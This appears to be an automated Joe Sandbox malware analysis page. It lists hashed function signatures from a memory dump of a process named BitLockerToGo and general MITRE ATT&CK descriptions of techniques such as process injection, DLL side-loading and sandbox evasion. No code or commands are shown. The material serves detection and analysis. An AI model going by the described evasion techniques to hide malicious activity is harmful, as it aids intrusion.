Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6701d4d19493718034ed081bfd7dd0a552cca0277a4e13a72d9ca30b83aa62e9
Instruction ID: 5011fda048142b2e3d3966aabbe6cb47e1743a9ebe8c74d2f421df85d8141cce
Opcode Fuzzy Hash: 6701d4d19493718034ed081bfd7dd0a552cca0277a4e13a72d9ca30b83aa62e9
Instruction Fuzzy Hash: 8E6290716083528FC715CF19D0D066AF7E1BF88314F198AADE9D99B382CB35E985CB81

Function 02A2461E Relevance: .7, Instructions: 738COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca42736165be2668b688e42b8530cb41558de7c6ac550d9eb99927af62d38182
Instruction ID: acfed64012f46a42fb92856072f2d31c603112c04842aad32917a98ed162685f
Opcode Fuzzy Hash: ca42736165be2668b688e42b8530cb41558de7c6ac550d9eb99927af62d38182
Instruction Fuzzy Hash: B15287B5600B41CFD728CF29D490B16BBF2BF89314F148A6DD5968BB91DB35E815CB80

Function 02A24643 Relevance: .7, Instructions: 695COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cdb88c655ead0cd730bb6ec9ab43fda9b4ce180ee5da17424535f0ab025ee9e
Instruction ID: 805f9d04995f83a339d48de2bf92cceeef57ae6f2fefe0b41e96d591525c0585
Opcode Fuzzy Hash: 0cdb88c655ead0cd730bb6ec9ab43fda9b4ce180ee5da17424535f0ab025ee9e
Instruction Fuzzy Hash: 4E4286B4600B41CFD728CF29D490B16BBF2BF89314F148A6DD5968BB91DB35E856CB80

Function 02A3B300 Relevance: .6, Instructions: 627COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871f83f2a90c50c4bdcc436ae1a5e3215a096a49ba873e2638091fe61a0cc9b0
Instruction ID: ca6139364f73fa00786c29fd38f8e007ce970aaa92e5f418b615ac78d0ad9561
Opcode Fuzzy Hash: 871f83f2a90c50c4bdcc436ae1a5e3215a096a49ba873e2638091fe61a0cc9b0
Instruction Fuzzy Hash: A012AC35A09251CFC708CF28D89066AB7E2FFC9318F098D6DE58697391DB32E915CB91

Function 02A04480 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f2445446c25462b4f8fbffe0ece20e34aae9849a79efa3624b9d4ec50605f3
Instruction ID: 89bbf830e839b02115acc289b11f69e2ee8605297c1302cf0291c160efd33b9a
Opcode Fuzzy Hash: 50f2445446c25462b4f8fbffe0ece20e34aae9849a79efa3624b9d4ec50605f3
Instruction Fuzzy Hash: 4C4220B4514B518FC368CF29E5D066ABBF1BF89310B908A2DD6978BB90DB35F844CB14

Function 02A066B0 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742987c90e22ed08cf6cbac228dd9194c393015a6de6f76366b14105b33c390a
Instruction ID: 1ccf484accc00cc6da804a70957d04f2d3f6e83000eedf55d9d38a3332694b0b
Opcode Fuzzy Hash: 742987c90e22ed08cf6cbac228dd9194c393015a6de6f76366b14105b33c390a
Instruction Fuzzy Hash: 4B02D331608340CFC718CF29C4C062ABBE5EF89708F48896DE9998B392DB75D855CB96

Function 02A3B630 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bca0735f4eca7cec3b2696249fc36fbc1a847b40b5cb522ae25a100bcdfc57d
Instruction ID: ba670bc890a937dd727e1b54838255aecb1c23d9f2058328efdeb2f6bc001bee
Opcode Fuzzy Hash: 0bca0735f4eca7cec3b2696249fc36fbc1a847b40b5cb522ae25a100bcdfc57d
Instruction Fuzzy Hash: 4FD1B035A09241CFC709CF28D89066AB7F2FFC9308F198D6DE58687295CB31E965CB91

Function 02A2582B Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f28c0247699e5e7324de752839ff151ed76e23a672ae865a275865e128a31a
Instruction ID: bc4bf3784500a93ef0c27f3c380e42f98ef2a4b6607343f6a7dc63195e4c2c92
Opcode Fuzzy Hash: e8f28c0247699e5e7324de752839ff151ed76e23a672ae865a275865e128a31a
Instruction Fuzzy Hash: FEE190B59047418FC729CF28C490B63B7F2BF89304B48896DC9AA4B796DB35F809CB51

Function 02A232B5 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc307bb0387d9e57702bd8fd74ee54be76f42e834f5ae26200db04391a8a0419
Instruction ID: b6ecc32fedb995ef280dce6e9148d858dbd414315450a3710743bb432536fd75
Opcode Fuzzy Hash: dc307bb0387d9e57702bd8fd74ee54be76f42e834f5ae26200db04391a8a0419
Instruction Fuzzy Hash: A1C10775908391CFC7148F28D49176BBBE6AFDA305F0848ADE4C587381DB39D91ACB82

Function 02A19212 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d891712b9bd7ccfd4761c7c5b63d5a4abe1b789d1d0acbc8a1482cd112477eb4
Instruction ID: 3f91f081549955f8ee02972cd36425b99690d226f63f02e1e4e78e8bb58ef2a7
Opcode Fuzzy Hash: d891712b9bd7ccfd4761c7c5b63d5a4abe1b789d1d0acbc8a1482cd112477eb4
Instruction Fuzzy Hash: 22919BB15183128BC715DF14C8A176BB3F2FF99364F05891CE8D69B290EB799944CB82

Function 02A1F321 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bb0be675b031f60f1351555034bb758592ff12006837e0d7052088d1b84e3e
Instruction ID: 87fb4b0d133a95922c316e01fa4a497d9fccb98ffd919fbc569d71c26978c8ea
Opcode Fuzzy Hash: 12bb0be675b031f60f1351555034bb758592ff12006837e0d7052088d1b84e3e
Instruction Fuzzy Hash: 86A1713AA58202CFD708CF28D45172AB3E2FFC9315F2A89ACE545C7281DB35D966CB40

Function 02A3CDD0 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9e098be6554ce8a04b2dc5b354093f5b0ad1d2c891f321ea354d65fa28ef5a
Instruction ID: 952b8f9ae7b298f8bcde4ff33b071d39dc80ffe407acb0b03ad1c4d6b187bd98
Opcode Fuzzy Hash: 2a9e098be6554ce8a04b2dc5b354093f5b0ad1d2c891f321ea354d65fa28ef5a
Instruction Fuzzy Hash: 4CA1E175A043128BC725DF18C89066AB7E2FF88724F19891DF985AB351DB35EC61CB81

Function 02A14188 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f9dd3ceb9af0f029a292b02a7c71a4909f2812524a9837c25a1c132c929c27
Instruction ID: a2a6967c76860a04b8489c7a7d88347d64dfab1123cd4a7025450598b6e1db2f
Opcode Fuzzy Hash: a0f9dd3ceb9af0f029a292b02a7c71a4909f2812524a9837c25a1c132c929c27
Instruction Fuzzy Hash: F2817075A00B028FD324CF39D8D0A66B3F2FF99324B188A6DD556877A0EB35E855CB14

Function 02A23909 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9123a6f430cf50d4e899a9bedcc28f7b8e1ec5688161bb6317e840688e47d922
Instruction ID: cf659314cb070989a823ac2de9de23afe349b880feb1d33de7a88464cfde387c
Opcode Fuzzy Hash: 9123a6f430cf50d4e899a9bedcc28f7b8e1ec5688161bb6317e840688e47d922
Instruction Fuzzy Hash: 31817C75500B128FCB24CF28C491767B3F1EF46354F048A5DD5A79BA90E778E846CB94

Function 02A3B920 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324b70fd4dc0b2237d5c29389f4f7dd9d3a54f358294f2ab9296338852c7647b
Instruction ID: 6f70030c9eb2bc949f3fdd1ed4e83d12129e904bf72e5861f5ea61d187608993
Opcode Fuzzy Hash: 324b70fd4dc0b2237d5c29389f4f7dd9d3a54f358294f2ab9296338852c7647b
Instruction Fuzzy Hash: E6719938A1D241CBC709CF28D89066AB7F2FB89308F058D6DE4C687295CB35D965CB92

Function 02A38EE0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ea50eec80fc41d1c974fd29539b0285831c4ed90a69cf14e8ffa151c3fdcc7
Instruction ID: 1aaefc2402fa4af9f1d4017e865cf12cb07ad126b555bd5743c0544b139f85b8
Opcode Fuzzy Hash: f4ea50eec80fc41d1c974fd29539b0285831c4ed90a69cf14e8ffa151c3fdcc7
Instruction Fuzzy Hash: 48819F7460D3928FC316CF29C4D062EBBE2AFC6214F18866EF4958B356DB35D806CB52

Function 02A120F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cdb3b865d6d9ae7b46e6b19e6525c8f5ba74222836831f5a42572d4449d23a
Instruction ID: 74ba9761139ff5ef5cd508d32864b3ac01746e905ce87ccbf3033d69acb40e68
Opcode Fuzzy Hash: 35cdb3b865d6d9ae7b46e6b19e6525c8f5ba74222836831f5a42572d4449d23a
Instruction Fuzzy Hash: 335146B9A00B008FD724DF65E981B26B3F6AF8A314F044828E99B87751EF35F815CB51

Function 02A03450 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6d6f56811edb0ed19fd759b697ffda81012dd30d00ea722c0c0a0423be0645
Instruction ID: 50fb3d11ab0e0314d6fce7cc893adb0bf49a99e8670d40dda7b53613f7471850
Opcode Fuzzy Hash: ec6d6f56811edb0ed19fd759b697ffda81012dd30d00ea722c0c0a0423be0645
Instruction Fuzzy Hash: 8641A3327082554BCB188E2D9CE027EBAD39FC5309F0D857EE8C6CB386DA78D9149754

Function 02A229FA Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563fd4777850edf017621b2db6f7b14d09bf5ddf9b071c877ba08221cee6c806
Instruction ID: b7d6d488628c754e54c12b88b227cc83b8ce9a71310a089edb11f74c1eafa0fe
Opcode Fuzzy Hash: 563fd4777850edf017621b2db6f7b14d09bf5ddf9b071c877ba08221cee6c806
Instruction Fuzzy Hash: DD51B172A083A08BE7158F6DC8D036FB7E2EBD5314F19482DE9858B341DB74D949CB92

Function 02A3C4B0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0472156888a9d07ee463277599612df771d5adf9853cb37a1831df0556469b40
Instruction ID: 5aa54a7226c15bca33dcbf123e89039a31a0553a655ef65c038168c165afca09
Opcode Fuzzy Hash: 0472156888a9d07ee463277599612df771d5adf9853cb37a1831df0556469b40
Instruction Fuzzy Hash: 3951A976608301AFD315DF18CC90B2AB7E2EFC5724F14991DF588AB291DB35E825CB42

Function 02A16550 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bf08c800798a68078740fb666f942003a42ae8da8ae73368dabfff4d5b9e55
Instruction ID: dde1239e35125137000371761ffc7c556fa874a711764b61cc662528b2780b73
Opcode Fuzzy Hash: 24bf08c800798a68078740fb666f942003a42ae8da8ae73368dabfff4d5b9e55
Instruction Fuzzy Hash: 7C4124B19083088BD7259F54D8C077AB7ECEF95B38F094669D9A9C7281EF71D804C752

Function 02A01A08 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a6bdb20465586c42fbdc23d61bf554e31a0d1f018767ce0abb60c89d8ccee5
Instruction ID: 028d4b237e01ca5e74c00158fbaad698155feeb123a0ef1beaf4f071b855fde5
Opcode Fuzzy Hash: 80a6bdb20465586c42fbdc23d61bf554e31a0d1f018767ce0abb60c89d8ccee5
Instruction Fuzzy Hash: 3541B4BA82C691DFE3084F21D0A1366BBE0BB56305F0949BEC5CA43681C739D5A1CBD2

Function 02A0F110 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d34a19c63f7637f87f8dd427f7a9af08a022e6e4645efd9bbedc43a2bb1f0b
Instruction ID: 8dd8a50da89effe8680dd232c14824430d0e1983c42da054aba5e809dd6f77f5
Opcode Fuzzy Hash: 59d34a19c63f7637f87f8dd427f7a9af08a022e6e4645efd9bbedc43a2bb1f0b
Instruction Fuzzy Hash: 71413A72B083904FE3188A3AD8E037ABBD39BC4310F49862EF1A9837D1DE758545D710

Function 02A25B83 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701ddb997d888cb486283e857c6a72f8b7978bba0664c9a4711aefc461ad29bb
Instruction ID: 24aa9e689a37bf40c4951d45ba1b0fcdb7c30dfc530b5dcaed9db5e627243400
Opcode Fuzzy Hash: 701ddb997d888cb486283e857c6a72f8b7978bba0664c9a4711aefc461ad29bb
Instruction Fuzzy Hash: 7D411DB4A41B108FD328CF19C495723B7F2FB99315F844A5CD4868BA52DB34F85ACB98

Function 02A15BA8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4e7cf42d9c1b082151a5429b4c226da23671380828fba53889f6a33ae6d802
Instruction ID: 39c23e3575ce5c618c276c039dc889b5005152900d1c66491db03a4d82efe50c
Opcode Fuzzy Hash: 9c4e7cf42d9c1b082151a5429b4c226da23671380828fba53889f6a33ae6d802
Instruction Fuzzy Hash: EA411474A083419BD324DF08D99072BFBF6FB86B58F54881CE584CB251DB76D812DB86

Function 02A25AEA Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f4aaf8b639e1871eff442ba7f633a9ed6ab8a0f648f173ee1f4091836ccd1e
Instruction ID: f0ddd8562b5381a1d00d82fc50041624bb7e092681548c0fe9fd5e9e287e82bd
Opcode Fuzzy Hash: f6f4aaf8b639e1871eff442ba7f633a9ed6ab8a0f648f173ee1f4091836ccd1e
Instruction Fuzzy Hash: D1314F70A057508FD329CF2AC495722B7F2FF59314B884A9DC4C68BA92D738E45ECB54

Function 02A25A01 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ed731bd3d76f9c4039257334337b56274e7543240edde6a45ce640636c386f
Instruction ID: 39095fec2f0a6f8cbda8717f31dcc7bd14ce797cef8d4683088ba20cc56c230e
Opcode Fuzzy Hash: c2ed731bd3d76f9c4039257334337b56274e7543240edde6a45ce640636c386f
Instruction Fuzzy Hash: 7A217A74E417119BD7388F19C8C6B23B7F2FB89308F98495CD0868B642DB35E459CB54

Function 02A3C1D0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78076cb57f633a216ed37bdb2f0c5a767503d6c5e0ad86a502c7957bc1a9e4c4
Instruction ID: 5113460e09d3346a5eb3fd3219e0adf6d8cd79a8fefaab9f00f3981d1c9f0da4
Opcode Fuzzy Hash: 78076cb57f633a216ed37bdb2f0c5a767503d6c5e0ad86a502c7957bc1a9e4c4
Instruction Fuzzy Hash: 7A318B75608305AFD711DF94C880A2BF7E2FBC5B18F04891DF8886B281DB30D905CB92

Function 02A26BB0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68df7baaaf10edeb6aacfac5415bb7d8a51baa0904ebc5e0ac7eb725a9e5e6c2
Instruction ID: dd7029d25f2646a55389e59b0f8d5d5d18e32f68ca9d26a7f239371e574c2ba2
Opcode Fuzzy Hash: 68df7baaaf10edeb6aacfac5415bb7d8a51baa0904ebc5e0ac7eb725a9e5e6c2
Instruction Fuzzy Hash: AC01B5F164175147DB20AF18A5D0B37B2ADAF54F04F08552CDE044B241DF79EC0886A5

Function 02A03620 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129ca96415bfc80373af7b5c821a53a4beba4d6694b064d205e5d6617f641cb0
Instruction ID: 0b33467257d58b0b1641662ffb0d25fbf8e9e513d309c180c9c91cef4645ad4e
Opcode Fuzzy Hash: 129ca96415bfc80373af7b5c821a53a4beba4d6694b064d205e5d6617f641cb0
Instruction Fuzzy Hash: B6F0B43AB9921617A720CDEAECC0977F3E6EBC9654F094478E941D3341DD66E8068294

Function 02A0E0E0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction ID: 29a34a2bf8712c1438d37991ff113463f73700155395f242e8fb89e0ecaea710
Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction Fuzzy Hash: 1DE0C266B496A10BA718CE3548E06B7B7E55A87326B1CA86DD892D3105C628C8155254

Function 02A36590 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 3992a34ddbe906825b5aa8a21e75f804096ad235b7d1f82b040338294415abb0
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 75D05B22508221579B758F199440577F7F4E9C7A11B45556EF681D314CD730D841C16D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
